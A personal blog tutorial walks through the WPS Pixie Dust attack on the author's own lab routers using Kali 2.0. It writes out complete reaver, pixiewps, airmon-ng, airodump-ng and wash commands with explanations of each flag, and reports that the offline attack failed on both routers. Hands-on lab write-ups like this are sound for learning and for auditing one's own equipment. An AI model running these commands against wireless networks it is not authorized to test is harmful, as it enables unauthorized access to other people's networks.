18 – WPS Offline Pixie Dust Attack

Hey everyone it’s been a while since my last blog entry and I recently started playing around with the WPS offline Pixie Dust Attack which I first mentioned back in May 2015 and wanted to document it as I have not had any success in exploiting a router vulnerable to this attack but that doesn’t mean we can’t exploit it using the older reaver method which I previously wrote about here and here. Please refer to my previous tutorial for some background on attacking WPS.
For this tutorial I am using Kali 2.0 “sana” in a VM which has all the necessary tools required to preform this attack so just get the latest ISO of Kali updated fully and you will be good to follow along 🙂

I have two routers that are susceptible to the old method using reaver so I used them again for this tutorial, unfortunately this doesn’t work but the the process does so it’s worthy of a blog entry!

First as always get your card into monitor mode, I actually came across a random issue that looks like it is a bug in Kali 2 “sana” when running airmon-ng

“airmon-ng check kill” will kill anything that may be interfering with your card when in monitor mode
“airmon-ng start wlan0” as you probably know now will place your card into monitor mode

1_Monitor_mode_Kali_Sana

1_Monitor_mode_Kali_Sana

As you can see instead of a new interface called “mon0” being created we instead have “wlan0mon” which will do the same thing. I thought it was worth mentioning as it was a weird issue.

Checking with iwconfig will show you that monitor mode is actually enabled so you don’t need to make any further changes:

“iwconfig” used below to make sure that the card is in monitor mode

2_iwconfig_monitor_mode_check

2_iwconfig_monitor_mode_check

BUT sometimes I have also found that even though it says the card is in monitor mode when you start airodump-ng sniffing the airwaves you actually see nothing so you just have to put the interface down and set monitor mode manually on the card.

“ifconfig wlan0mon down” this will put the interface down
“iwconfig wlan0mon mode monitor” this will manually set monitor mode on the wireless interface
“ifconfig wlan0mon up” this will put the interface up again

3_Kali_sana_manual_monitor_mode_configuration

3_Kali_sana_manual_monitor_mode_configuration

After you do this if you run

“airodump-ng wlan0mon” to make sure you are sniffing the airwaves

You will see things are working as expected:

4_airodump-ng_output_after_manual_configuration

4_airodump-ng_output_after_manual_configuration

My lab routers for attacking are named “dlink” and “test” under the ESSID column above

Trying this attack against the access point labeled test first:

“reaver” runs reaver
“-i wlan0mon” specifies that you want to use the wlan0mon interface for this attack
“-b 2C:B0:5D:XX:XX:XX” is used to specify the MAC address of the access point you are targeting
“-vv” is used to display very verbose output
“-w” used to mimic a Windows 7 registrar
“-n” is used as this target access point always sends a NACK
“-S” is to only use small DH keys to improve the cracking speed
“-c 1” is used to specify the channel on which the access point resides

reaver -i wlan0mon -b 2C:B0:5D:XX:XX:XX -vv -w -n -S -c 1

5_reaver_pixiedust_attack_kali_2_sana

5_reaver_pixiedust_attack_kali_2_sana

You may get different results with different access points so make sure you look at the reaver and pixiewps man pages and try different switches! I already know this access point is not vulnerable but just to show you what to do with this information all you need to do is open up pixiewps and enter in the following details you just enumerated in order to crack WPS on the target access point:

“pixiewps” runs pixiewps
“-e” Enrollee public key
“-s” Enrollee hash1
“-z” Enrollee hash2
“-a” Authentication session key
“-n” Enrollee nonce (mode 2,3,4)
“-S” Small Diffie-Hellman keys (PKr not needed)

pixiewps -e PKE -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce -S

6_pixiewps_kali_2_sana_pin

6_pixiewps_kali_2_sana_pin

As you can see no WPS pin is found but that just means my access point is not vulnerable to this offline attack method, it is however vulnerable to the online method as can be seen in previous tutorials here and here.

Now I also have another access point to check labeled “dlink” as you can see above so lets jump straight to it!

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -vv -w -n -S -c 6

This PIN generated is incorrect as the PIN on the router is neither of the PIN’s generated below but it’s worth trying if the access point is either a D-link of Belkin, you may get lucky with the default PIN generator created by the devttys0 team especially if your router is listed in the D-link or Belkin posts showing how they were reversed in order to generate these WPS PIN’s.

7_Kali_sana_2_pixiewps_d-link_default_pin_generation

7_Kali_sana_2_pixiewps_d-link_default_pin_generation

Another method

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-a” to auto detect the best advanced options for the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-K 1” to Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek). Increment the value after -K.
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -a -vv -w  -K 1 -n -S -c 6

8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method

8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method

Even though these methods aren’t working for me it doesn’t mean they won’t work for you so give them a try on your home router and see if you are vulnerable to this attack as the amount of time needed to crack a wireless network is greatly decreased if this method works so it’s definitely worth trying.

Before I end this tutorial though I just want to point you in the direction of some cool switches I discovered in the latest version of the aircrack-ng suite which you can use for WPS enumeration.

“airodump-ng” to start airodump-ng sniffing the airwaves
“-i wlan0mon” to set the interface to sniff on
“-W” to display if the access point supports WPS
The first field of the  column  indicates the version supported. The second field indicates the WPS config methods of which there can be more than one separated by a comma:
USB = USB method,
ETHER = Ethernet,
LAB = Label,
DISP = Display,
EXTNFC = External NFC,
INTNFC = Internal NFC,
NFCINTF  =  NFC Interface,
PBC = Push Button,
KPAD =  Keypad. Locked is displayed when the AP setup is locked.
“-M” to display the manufacturer from the IEEE OUI list

airodump-ng -i wlan0mon -W -M

9_Kali_sana_airodump-ng_WPS_enumeration

9_Kali_sana_airodump-ng_WPS_enumeration

Wash also has a cool feature now too to enumerate some more information from your router

“wash” to run wash
“-i wlan0mon” to run the interface of your wireless card
“-g” to pipe output and run reaver alongside wash to get the chipset
“-c 1” specifies the channel you wish to run on

wash -i wlan0mon -g -c 1

10_Kali_sana_wash_enumeration

10_Kali_sana_wash_enumeration

It’s handy for checking if the access point is locked out quickly before trying the reaver or Pixie Dust Attack.

That’s it for now, attacking WPS has come a long way in a short period of time and it’s only a matter of time until this is a simple procedure that works in a matter of seconds to minutes once enough PIN generation algorithms are reversed and added to make this much simpler than WEP to crack. You remember how easy WEP was to crack right, it’s like traveling back in time to 2005 all over again.

 

Leave a Reply